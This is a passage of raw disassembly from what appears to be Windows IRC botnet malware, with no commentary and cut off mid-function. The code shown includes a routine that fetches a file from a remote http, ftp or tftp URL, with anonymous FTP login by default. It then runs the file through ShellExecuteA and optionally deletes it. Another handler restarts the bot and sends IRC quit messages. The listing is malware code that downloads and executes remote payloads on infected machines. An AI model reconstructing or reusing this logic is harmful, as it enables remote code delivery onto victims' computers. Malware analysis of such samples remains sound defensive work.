sub_402A2B proc near ; CODE XREF: sub_402A32+673�p
push ebp
mov ebp, esp
xor eax, eax
pop ebp
retn
sub_402A2B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A32 proc near ; DATA XREF: sub_403260+BC�o
var_814 = qword ptr -814h
var_804 = qword ptr -804h
var_7FC = dword ptr -7FCh
var_7F8 = qword ptr -7F8h
var_7F0 = dword ptr -7F0h
var_7EC = dword ptr -7ECh
var_7E8 = dword ptr -7E8h
var_7E4 = dword ptr -7E4h
var_7E0 = dword ptr -7E0h
var_7DC = byte ptr -7DCh
var_6D5 = byte ptr -6D5h
var_6D4 = byte ptr -6D4h
var_6CC = dword ptr -6CCh
var_6C8 = dword ptr -6C8h
var_6C4 = dword ptr -6C4h
var_6C0 = dword ptr -6C0h
var_6BC = byte ptr -6BCh
var_6BB = byte ptr -6BBh
var_63C = dword ptr -63Ch
var_638 = byte ptr -638h
var_637 = byte ptr -637h
var_632 = byte ptr -632h
var_631 = byte ptr -631h
var_534 = byte ptr -534h
var_430 = byte ptr -430h
var_2A8 = byte ptr -2A8h
var_2A7 = byte ptr -2A7h
var_2A6 = byte ptr -2A6h
var_2A3 = byte ptr -2A3h
var_296 = byte ptr -296h
var_28C = dword ptr -28Ch
var_288 = dword ptr -288h
var_284 = byte ptr -284h
var_283 = byte ptr -283h
var_204 = byte ptr -204h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 804h
push edi
push 3AFh
push [ebp+arg_0]
lea eax, [ebp+var_63C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_638]
push eax
lea eax, [ebp+var_7DC]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
and [ebp+var_288], 0
mov [ebp+var_28C], 1
and [ebp+var_6CC], 0
mov al, ds:byte_41DF00
mov [ebp+var_284], al
push 1Fh
pop ecx
xor eax, eax
lea edi, [ebp+var_283]
rep stosd
stosw
stosb
mov al, ds:byte_41DF00
mov [ebp+var_6BC], al
push 1Fh
pop ecx
xor eax, eax
lea edi, [ebp+var_6BB]
rep stosd
stosw
stosb
and [ebp+var_6C8], 0
lea eax, [ebp+var_534]
push eax
lea eax, [ebp+var_7DC]
push eax
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset dword_4185CC
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 14h
push 7
push offset dword_4185C4
lea eax, [ebp+var_638]
push eax
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz loc_402B93
push 0
lea eax, [ebp+var_534]
push eax
lea eax, [ebp+var_631]
push eax
call ds:dword_417060 ; CopyFileA
test eax, eax
jnz short loc_402B8E
call ds:dword_417064 ; RtlGetLastWin32Error
cmp eax, 20h
jnz short loc_402B58
lea eax, [ebp+var_534]
push eax
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset dword_41858C
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 10h
jmp short loc_402B7B
; ---------------------------------------------------------------------------
loc_402B58: ; CODE XREF: sub_402A32+FF�j
lea eax, [ebp+var_631]
push eax
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset dword_41855C
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 10h
loc_402B7B: ; CODE XREF: sub_402A32+124�j
push [ebp+var_63C]
call sub_409763
pop ecx
xor eax, eax
jmp loc_40325B
; ---------------------------------------------------------------------------
loc_402B8E: ; CODE XREF: sub_402A32+F4�j
jmp loc_403256
; ---------------------------------------------------------------------------
loc_402B93: ; CODE XREF: sub_402A32+D6�j
lea eax, [ebp+var_638]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_6C0], eax
jmp short loc_402BB5
; ---------------------------------------------------------------------------
loc_402BA8: ; CODE XREF: sub_402A32:loc_402CD8�j
mov eax, [ebp+var_6C0]
dec eax
mov [ebp+var_6C0], eax
loc_402BB5: ; CODE XREF: sub_402A32+174�j
cmp [ebp+var_6C0], 0FFFFFFFFh
jz loc_402CDD
mov eax, [ebp+var_6C0]
movsx eax, [ebp+eax+var_638]
cmp eax, 3Ah
jnz loc_402CD8
mov [ebp+var_7E0], 1
jmp short loc_402BF2
; ---------------------------------------------------------------------------
loc_402BE5: ; CODE XREF: sub_402A32:loc_402CD3�j
mov eax, [ebp+var_7E0]
inc eax
mov [ebp+var_7E0], eax
loc_402BF2: ; CODE XREF: sub_402A32+1B1�j
mov eax, [ebp+var_6C0]
add eax, [ebp+var_7E0]
movsx eax, [ebp+eax+var_638]
test eax, eax
jz short loc_402C23
mov eax, [ebp+var_6C0]
add eax, [ebp+var_7E0]
movsx eax, [ebp+eax+var_638]
cmp eax, 2Fh
jnz short loc_402C7A
loc_402C23: ; CODE XREF: sub_402A32+1D6�j
mov eax, [ebp+var_7E0]
and [ebp+eax+var_6D5], 0
lea eax, [ebp+var_6D4]
push eax
call sub_40422A
pop ecx
test eax, eax
jz short loc_402C75
mov eax, [ebp+var_6C0]
lea eax, [ebp+eax+var_638]
add eax, [ebp+var_7E0]
push eax
mov eax, [ebp+var_6C0]
lea eax, [ebp+eax+var_638]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
mov [ebp+var_6C8], 1
loc_402C75: ; CODE XREF: sub_402A32+20E�j
jmp loc_403251
; ---------------------------------------------------------------------------
loc_402C7A: ; CODE XREF: sub_402A32+1EF�j
mov eax, [ebp+var_6C0]
add eax, [ebp+var_7E0]
movsx eax, [ebp+eax+var_638]
cmp eax, 30h
jl short loc_402CCE
mov eax, [ebp+var_6C0]
add eax, [ebp+var_7E0]
movsx eax, [ebp+eax+var_638]
cmp eax, 39h
jg short loc_402CCE
mov eax, [ebp+var_6C0]
add eax, [ebp+var_7E0]
mov ecx, [ebp+var_7E0]
mov al, [ebp+eax+var_638]
mov [ebp+ecx+var_6D5], al
jmp short loc_402CD3
; ---------------------------------------------------------------------------
loc_402CCE: ; CODE XREF: sub_402A32+25F�j
; sub_402A32+278�j
jmp loc_40324C
; ---------------------------------------------------------------------------
loc_402CD3: ; CODE XREF: sub_402A32+29A�j
jmp loc_402BE5
; ---------------------------------------------------------------------------
loc_402CD8: ; CODE XREF: sub_402A32+1A1�j
jmp loc_402BA8
; ---------------------------------------------------------------------------
loc_402CDD: ; CODE XREF: sub_402A32+18A�j
; sub_402A32:loc_40324C�j ...
push 7
push offset aHttp ; "http://"
lea eax, [ebp+var_638]
push eax
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_402D37
cmp [ebp+var_6C8], 0
jnz short loc_402D13
push offset a80 ; "80"
lea eax, [ebp+var_6D4]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_402D13: ; CODE XREF: sub_402A32+2CC�j
lea eax, [ebp+var_631]
push eax
lea eax, [ebp+var_638]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
mov [ebp+var_6CC], 1
jmp loc_402E3D
; ---------------------------------------------------------------------------
loc_402D37: ; CODE XREF: sub_402A32+2C3�j
push 6
push offset aFtp ; "ftp://"
lea eax, [ebp+var_638]
push eax
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_402DB7
cmp [ebp+var_6C8], 0
jnz short loc_402D6D
push offset a21 ; "21"
lea eax, [ebp+var_6D4]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_402D6D: ; CODE XREF: sub_402A32+326�j
lea eax, [ebp+var_632]
push eax
lea eax, [ebp+var_638]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
mov [ebp+var_6CC], 2
push offset aAnonymous ; "anonymous"
lea eax, [ebp+var_284]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
push offset aAnonymous ; "anonymous"
lea eax, [ebp+var_6BC]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp loc_402E3D
; ---------------------------------------------------------------------------
loc_402DB7: ; CODE XREF: sub_402A32+31D�j
push 7
push offset aTftp ; "tftp://"
lea eax, [ebp+var_638]
push eax
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_402E0E
cmp [ebp+var_6C8], 0
jnz short loc_402DED
push offset a69 ; "69"
lea eax, [ebp+var_6D4]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_402DED: ; CODE XREF: sub_402A32+3A6�j
lea eax, [ebp+var_631]
push eax
lea eax, [ebp+var_638]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
mov [ebp+var_6CC], 3
jmp short loc_402E3D
; ---------------------------------------------------------------------------
loc_402E0E: ; CODE XREF: sub_402A32+39D�j
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset unk_418500
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 0Ch
push [ebp+var_63C]
call sub_409763
pop ecx
xor eax, eax
jmp loc_40325B
; ---------------------------------------------------------------------------
loc_402E3D: ; CODE XREF: sub_402A32+300�j
; sub_402A32+380�j ...
lea eax, [ebp+var_638]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_6C0], eax
jmp short loc_402E5F
; ---------------------------------------------------------------------------
loc_402E52: ; CODE XREF: sub_402A32:loc_402F11�j
mov eax, [ebp+var_6C0]
dec eax
mov [ebp+var_6C0], eax
loc_402E5F: ; CODE XREF: sub_402A32+41E�j
cmp [ebp+var_6C0], 0FFFFFFFFh
jz loc_402F16
mov eax, [ebp+var_6C0]
movsx eax, [ebp+eax+var_638]
cmp eax, 40h
jnz loc_402F11
mov eax, [ebp+var_6C0]
and [ebp+eax+var_638], 0
push offset asc_4184FC ; ":"
lea eax, [ebp+var_638]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_7E4], eax
cmp [ebp+var_7E4], 0
jz short loc_402ED8
mov eax, [ebp+var_7E4]
and byte ptr [eax], 0
push 80h
mov eax, [ebp+var_7E4]
inc eax
push eax
lea eax, [ebp+var_6BC]
push eax
call sub_407A56
add esp, 0Ch
loc_402ED8: ; CODE XREF: sub_402A32+47F�j
push 80h
lea eax, [ebp+var_638]
push eax
lea eax, [ebp+var_284]
push eax
call sub_407A56
add esp, 0Ch
mov eax, [ebp+var_6C0]
lea eax, [ebp+eax+var_637]
push eax
lea eax, [ebp+var_638]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_402F16
; ---------------------------------------------------------------------------
loc_402F11: ; CODE XREF: sub_402A32+44B�j
jmp loc_402E52
; ---------------------------------------------------------------------------
loc_402F16: ; CODE XREF: sub_402A32+434�j
; sub_402A32+4DD�j
push offset asc_4184F8 ; "/"
lea eax, [ebp+var_638]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_288], eax
cmp [ebp+var_288], 0
jnz short loc_402F67
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset unk_4184CC
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 0Ch
push [ebp+var_63C]
call sub_409763
pop ecx
xor eax, eax
jmp loc_40325B
; ---------------------------------------------------------------------------
loc_402F67: ; CODE XREF: sub_402A32+504�j
mov eax, [ebp+var_288]
inc eax
push eax
lea eax, [ebp+var_204]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
mov eax, [ebp+var_288]
and byte ptr [eax], 0
lea eax, [ebp+var_638]
push eax
lea eax, [ebp+var_100]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
call sub_416B64 ; clock
mov [ebp-6D8h], eax
and [ebp+var_6C4], 0
cmp [ebp+var_6CC], 1
jnz short loc_403009
push [ebp+var_63C]
movsx eax, [ebp+var_2A8]
neg eax
sbb eax, eax
neg eax
push eax
lea eax, [ebp+var_6C4]
push eax
lea eax, [ebp+var_534]
push eax
lea eax, [ebp+var_204]
push eax
lea eax, [ebp+var_6D4]
push eax
lea eax, [ebp+var_100]
push eax
lea eax, [ebp+var_6BC]
push eax
lea eax, [ebp+var_284]
push eax
call sub_402698
add esp, 24h
mov [ebp+var_28C], eax
loc_403009: ; CODE XREF: sub_402A32+582�j
cmp [ebp+var_6CC], 2
jnz short loc_403065
push [ebp+var_63C]
movsx eax, [ebp+var_2A8]
neg eax
sbb eax, eax
neg eax
push eax
lea eax, [ebp+var_6C4]
push eax
lea eax, [ebp+var_534]
push eax
lea eax, [ebp+var_204]
push eax
lea eax, [ebp+var_6D4]
push eax
lea eax, [ebp+var_100]
push eax
lea eax, [ebp+var_6BC]
push eax
lea eax, [ebp+var_284]
push eax
call sub_402A24
add esp, 24h
mov [ebp+var_28C], eax
loc_403065: ; CODE XREF: sub_402A32+5DE�j
cmp [ebp+var_6CC], 3
jnz short loc_4030B3
push [ebp+var_63C]
movsx eax, [ebp+var_2A8]
neg eax
sbb eax, eax
neg eax
push eax
lea eax, [ebp+var_6C4]
push eax
lea eax, [ebp+var_534]
push eax
lea eax, [ebp+var_204]
push eax
lea eax, [ebp+var_6D4]
push eax
lea eax, [ebp+var_100]
push eax
call sub_402A2B
add esp, 1Ch
mov [ebp+var_28C], eax
loc_4030B3: ; CODE XREF: sub_402A32+63A�j
; sub_402A32:loc_403256�j
cmp [ebp+var_28C], 1
jnz loc_403219
movsx eax, [ebp+var_296]
test eax, eax
jz short loc_4030D7
mov [ebp+var_7EC], offset dword_4184C0
jmp short loc_403104
; ---------------------------------------------------------------------------
loc_4030D7: ; CODE XREF: sub_402A32+697�j
movsx eax, [ebp+var_2A6]
test eax, eax
jz short loc_4030EE
mov [ebp+var_7F0], offset dword_4184B4
jmp short loc_4030F8
; ---------------------------------------------------------------------------
loc_4030EE: ; CODE XREF: sub_402A32+6AE�j
mov [ebp+var_7F0], offset byte_41DF00
loc_4030F8: ; CODE XREF: sub_402A32+6BA�j
mov eax, [ebp+var_7F0]
mov [ebp+var_7EC], eax
loc_403104: ; CODE XREF: sub_402A32+6A3�j
push [ebp+var_7EC]
mov eax, [ebp+var_6C4]
shr eax, 0Ah
mov dword ptr [ebp+var_7F8], eax
and dword ptr [ebp+var_7F8+4], 0
fild [ebp+var_7F8]
fstp [ebp+var_7FC]
call sub_416B64 ; clock
sub eax, [ebp-6D8h]
mov dword ptr [ebp+var_804], eax
and dword ptr [ebp+var_804+4], 0
fild [ebp+var_804]
fdiv ds:flt_417270
fdivr [ebp+var_7FC]
push ecx
push ecx
fstp [esp+814h+var_814]
lea eax, [ebp+var_534]
push eax
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset dword_41846C
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 1Ch
movsx eax, [ebp+var_2A7]
test eax, eax
jz short loc_403198
lea eax, [ebp+var_534]
push eax
call ds:dword_4170AC ; DeleteFileA
jmp short loc_403217
; ---------------------------------------------------------------------------
loc_403198: ; CODE XREF: sub_402A32+755�j
movsx eax, [ebp+var_2A6]
test eax, eax
jnz short loc_4031AE
movsx eax, [ebp+var_296]
test eax, eax
jz short loc_403217
loc_4031AE: ; CODE XREF: sub_402A32+76F�j
movsx eax, [ebp+var_2A3]
neg eax
sbb eax, eax
inc eax
push eax
push 0
push 0
lea eax, [ebp+var_534]
push eax
push offset aOpen ; "open"
push 0
call ds:dword_4171D0 ; ShellExecuteA
mov [ebp+var_7E8], eax
cmp [ebp+var_7E8], 20h
jbe short loc_4031F4
movsx eax, [ebp+var_296]
test eax, eax
jz short loc_4031F2
call sub_407148
loc_4031F2: ; CODE XREF: sub_402A32+7B9�j
jmp short loc_403217
; ---------------------------------------------------------------------------
loc_4031F4: ; CODE XREF: sub_402A32+7AE�j
lea eax, [ebp+var_534]
push eax
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset dword_418444
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 10h
loc_403217: ; CODE XREF: sub_402A32+764�j
; sub_402A32+77A�j ...
jmp short loc_40323C
; ---------------------------------------------------------------------------
loc_403219: ; CODE XREF: sub_402A32+688�j
lea eax, [ebp+var_7DC]
push eax
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset dword_418414
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 10h
loc_40323C: ; CODE XREF: sub_402A32:loc_403217�j
push [ebp+var_63C]
call sub_409763
pop ecx
xor eax, eax
jmp short loc_40325B
; ---------------------------------------------------------------------------
loc_40324C: ; CODE XREF: sub_402A32:loc_402CCE�j
jmp loc_402CDD
; ---------------------------------------------------------------------------
loc_403251: ; CODE XREF: sub_402A32:loc_402C75�j
jmp loc_402CDD
; ---------------------------------------------------------------------------
loc_403256: ; CODE XREF: sub_402A32:loc_402B8E�j
jmp loc_4030B3
; ---------------------------------------------------------------------------
loc_40325B: ; CODE XREF: sub_402A32+157�j
; sub_402A32+406�j ...
pop edi
leave
retn 4
sub_402A32 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403260 proc near ; CODE XREF: sub_40A9CF+959�p
var_14 = dword ptr -14h
var_10 = byte ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
cmp [ebp+arg_4], 0
jnz short loc_403271
jmp locret_403329
; ---------------------------------------------------------------------------
loc_403271: ; CODE XREF: sub_403260+A�j
push 3AFh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_40328A
jmp locret_403329
; ---------------------------------------------------------------------------
loc_40328A: ; CODE XREF: sub_403260+23�j
push 8
push 7Ah
push 61h
push 4
lea eax, [ebp+var_10]
push eax
call sub_410501
add esp, 14h
and [ebp+eax+var_10], 0
push offset dword_418620
lea eax, [ebp+var_10]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
cmp [ebp+arg_8], 0
jnz short loc_4032BF
lea eax, [ebp+var_10]
mov [ebp+arg_8], eax
loc_4032BF: ; CODE XREF: sub_403260+57�j
push 104h
push [ebp+arg_4]
mov eax, [ebp+var_14]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
push 104h
push [ebp+arg_8]
mov eax, [ebp+var_14]
add eax, 108h
push eax
call sub_407A56
add esp, 0Ch
push [ebp+arg_0]
mov eax, [ebp+var_14]
add eax, 20Ch
push eax
call sub_405F67
pop ecx
pop ecx
mov eax, [ebp+var_14]
add eax, 108h
push eax
mov eax, [ebp+var_14]
add eax, 4
push eax
push offset dword_4185FC
push 0
push [ebp+var_14]
push offset sub_402A32
call sub_4095A4
add esp, 18h
locret_403329: ; CODE XREF: sub_403260+C�j
; sub_403260+25�j
leave
retn
sub_403260 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40332B proc near ; CODE XREF: sub_4093B6+A0�p
; sub_4094E6+9B�p ...
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = byte ptr -10Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 114h
push 1
push offset dword_41DF0C
call sub_409C88
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp ds:dword_41DF08, 0
jz loc_4034D9
mov [ebp+var_8], offset aException_othe ; "EXCEPTION_OTHER"
mov eax, [ebp+arg_0]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_110], eax
cmp [ebp+var_110], 0C0000025h
ja short loc_4033A4
cmp [ebp+var_110], 0C0000025h
jz short loc_4033FA
cmp [ebp+var_110], 80000003h
jz short loc_4033DF
cmp [ebp+var_110], 0C0000005h
jz short loc_4033D6
cmp [ebp+var_110], 0C000001Dh
jz short loc_4033E8
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_4033A4: ; CODE XREF: sub_40332B+45�j
cmp [ebp+var_110], 0C000008Dh
jb short loc_403413
cmp [ebp+var_110], 0C0000093h
jbe short loc_40340C
cmp [ebp+var_110], 0C0000094h
jz short loc_4033F1
cmp [ebp+var_110], 0C00000FDh
jz short loc_403403
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_4033D6: ; CODE XREF: sub_40332B+69�j
mov [ebp+var_8], offset aException_acce ; "EXCEPTION_ACCESS_VIOLATION"
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_4033DF: ; CODE XREF: sub_40332B+5D�j
mov [ebp+var_8], offset aException_brea ; "EXCEPTION_BREAKPOINT"
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_4033E8: ; CODE XREF: sub_40332B+75�j
mov [ebp+var_8], offset aException_ille ; "EXCEPTION_ILLEGAL_INSTRUCTION"
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_4033F1: ; CODE XREF: sub_40332B+9B�j
mov [ebp+var_8], offset aException_int_ ; "EXCEPTION_INT_DIVIDE_BY_ZERO"
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_4033FA: ; CODE XREF: sub_40332B+51�j
mov [ebp+var_8], offset aException_nonc ; "EXCEPTION_NONCONTINUABLE_EXCEPTION"
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_403403: ; CODE XREF: sub_40332B+A7�j
mov [ebp+var_8], offset aException_stac ; "EXCEPTION_STACK_OVERFLOW"
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_40340C: ; CODE XREF: sub_40332B+8F�j
mov [ebp+var_8], offset aException_flt ; "EXCEPTION_FLT"
loc_403413: ; CODE XREF: sub_40332B+77�j
; sub_40332B+83�j ...
mov eax, [ebp+arg_0]
mov eax, [eax]
cmp dword ptr [eax+4], 1
jnz short loc_40342A
mov [ebp+var_114], offset aRestarting ; "Restarting"
jmp short loc_403434
; ---------------------------------------------------------------------------
loc_40342A: ; CODE XREF: sub_40332B+F1�j
mov [ebp+var_114], offset aContinuing ; "Continuing"
loc_403434: ; CODE XREF: sub_40332B+FD�j
push [ebp+var_114]
push [ebp+var_8]
mov eax, [ebp+arg_0]
mov eax, [eax]
push dword ptr [eax]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0C0h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0B8h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0C4h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0B4h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+9Ch]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0A0h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0A8h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0ACh]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0A4h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0B0h]
mov eax, [ebp+var_4]
inc eax
push eax
push [ebp+arg_8]
push [ebp+arg_4]
push offset dword_41864C
push offset dword_41DB88
call sub_40D4AB
add esp, 48h
loc_4034D9: ; CODE XREF: sub_40332B+21�j
mov eax, [ebp+var_4]
inc eax
cmp eax, 64h
jz short loc_4034ED
mov eax, [ebp+arg_0]
mov eax, [eax]
cmp dword ptr [eax+4], 1
jnz short loc_403558
loc_4034ED: ; CODE XREF: sub_40332B+1B5�j
push 104h
lea eax, [ebp+var_10C]
push eax
push 0
call ds:dword_41708C ; GetModuleHandleA
push eax
call ds:dword_417090 ; GetModuleFileNameA
test eax, eax
jz short loc_403545
push 0
push 0
push 0
lea eax, [ebp+var_10C]
push eax
push offset aOpen ; "open"
push 0
call ds:dword_4171D0 ; ShellExecuteA
cmp eax, 20h
ja short loc_403538
push offset aQuitExitting ; "QUIT :exitting"
call sub_40D6CB
pop ecx
jmp short loc_403543
; ---------------------------------------------------------------------------
loc_403538: ; CODE XREF: sub_40332B+1FE�j
push offset aQuitRestarting ; "QUIT :restarting"
call sub_40D6CB
pop ecx
loc_403543: ; CODE XREF: sub_40332B+20B�j
jmp short loc_403550
; ---------------------------------------------------------------------------
loc_403545: ; CODE XREF: sub_40332B+1DF�j
push offset aQuitRestarting ; "QUIT :restarting"
call sub_40D6CB
pop ecx
loc_403550: ; CODE XREF: sub_40332B:loc_403543�j
push 0
call ds:dword_41705C ; ExitProcess
loc_403558: ; CODE XREF: sub_40332B+1C0�j
mov eax, [ebp+arg_0]
mov eax, [eax]
cmp dword ptr [eax], 80000003h
jnz short loc_403583
mov eax, [ebp+arg_0]
mov eax, [eax+4]
mov eax, [eax+0B8h]
inc eax
mov ecx, [ebp+arg_0]
mov ecx, [ecx+4]
mov [ecx+0B8h], eax
or eax, 0FFFFFFFFh
jmp short locret_403586
; ---------------------------------------------------------------------------
loc_403583: ; CODE XREF: sub_40332B+238�j
push 1
pop eax
locret_403586: ; CODE XREF: sub_40332B+256�j
leave
retn
sub_40332B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403588 proc near ; DATA XREF: sub_403BD3:loc_403D85�o
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2E = word ptr -2Eh
var_2C = dword ptr -2Ch
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 48h
cmp [ebp+arg_8], 0
jz short loc_4035E2
mov eax, [ebp+arg_8]
cmp dword ptr [eax+4], 0
jz short loc_4035BB
mov eax, [ebp+arg_8]
cmp dword ptr [eax+4], 2
jz short loc_4035BB
push 273Fh
call ds:dword_417234 ; WSASetLastError
mov eax, 273Fh
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_4035BB: ; CODE XREF: sub_403588+13�j
; sub_403588+1C�j
mov eax, [ebp+arg_8]
cmp dword ptr [eax+8], 1
jz short loc_4035E2
mov eax, [ebp+arg_8]
cmp dword ptr [eax+8], 2
jz short loc_4035E2
push 273Ch
call ds:dword_417234 ; WSASetLastError
mov eax, 273Ch
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_4035E2: ; CODE XREF: sub_403588+A�j
; sub_403588+3A�j ...
cmp [ebp+arg_0], 0
jnz loc_4036D6
push 30h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_34], eax
cmp [ebp+var_34], 0
jnz short loc_40360D
push 8
call ds:dword_417234 ; WSASetLastError
push 8
pop eax
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_40360D: ; CODE XREF: sub_403588+73�j
push 30h
push 0
push [ebp+var_34]
call sub_416B6A ; memset
add esp, 0Ch
push 10h
push 0
lea eax, [ebp+var_30]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_30], 2
cmp [ebp+arg_4], 0
jz short loc_40364C
push [ebp+arg_4]
call sub_416B9C ; atoi
pop ecx
push eax
call ds:dword_417238 ; ntohs
mov [ebp+var_2E], ax
loc_40364C: ; CODE XREF: sub_403588+AE�j
mov eax, [ebp+var_34]
mov dword ptr [eax+4], 2
cmp [ebp+arg_8], 0
jz short loc_403667
mov eax, [ebp+arg_8]
mov eax, [eax+8]
mov [ebp+var_38], eax
jmp short loc_40366E
; ---------------------------------------------------------------------------
loc_403667: ; CODE XREF: sub_403588+D2�j
mov [ebp+var_38], 1
loc_40366E: ; CODE XREF: sub_403588+DD�j
mov eax, [ebp+var_34]
mov ecx, [ebp+var_38]
mov [eax+8], ecx
cmp [ebp+arg_8], 0
jz short loc_403688
mov eax, [ebp+arg_8]
mov eax, [eax+0Ch]
mov [ebp+var_3C], eax
jmp short loc_40368F
; ---------------------------------------------------------------------------
loc_403688: ; CODE XREF: sub_403588+F3�j
mov [ebp+var_3C], 6
loc_40368F: ; CODE XREF: sub_403588+FE�j
mov eax, [ebp+var_34]
mov ecx, [ebp+var_3C]
mov [eax+0Ch], ecx
mov eax, [ebp+var_34]
mov dword ptr [eax+10h], 10h
mov eax, [ebp+var_34]
add eax, 20h
mov ecx, [ebp+var_34]
mov [ecx+18h], eax
and [ebp+var_2C], 0
push 10h
lea eax, [ebp+var_30]
push eax
mov eax, [ebp+var_34]
add eax, 20h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_34]
mov [eax], ecx
xor eax, eax
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_4036D6: ; CODE XREF: sub_403588+5E�j
push [ebp+arg_0]
call ds:dword_41723C ; gethostbyname
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_4036F2
mov eax, 2AFBh
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_4036F2: ; CODE XREF: sub_403588+15E�j
and [ebp+var_20], 0
jmp short loc_4036FF
; ---------------------------------------------------------------------------
loc_4036F8: ; CODE XREF: sub_403588+18C�j
mov eax, [ebp+var_20]
inc eax
mov [ebp+var_20], eax
loc_4036FF: ; CODE XREF: sub_403588+16E�j
cmp [ebp+var_14], 0
jz short loc_403716
mov eax, [ebp+var_14]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_20]
cmp dword ptr [eax+ecx*4], 0
jz short loc_403716
jmp short loc_4036F8
; ---------------------------------------------------------------------------
loc_403716: ; CODE XREF: sub_403588+17B�j
; sub_403588+18A�j
cmp [ebp+var_20], 0
jnz short loc_403726
mov eax, 2AFBh
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_403726: ; CODE XREF: sub_403588+192�j
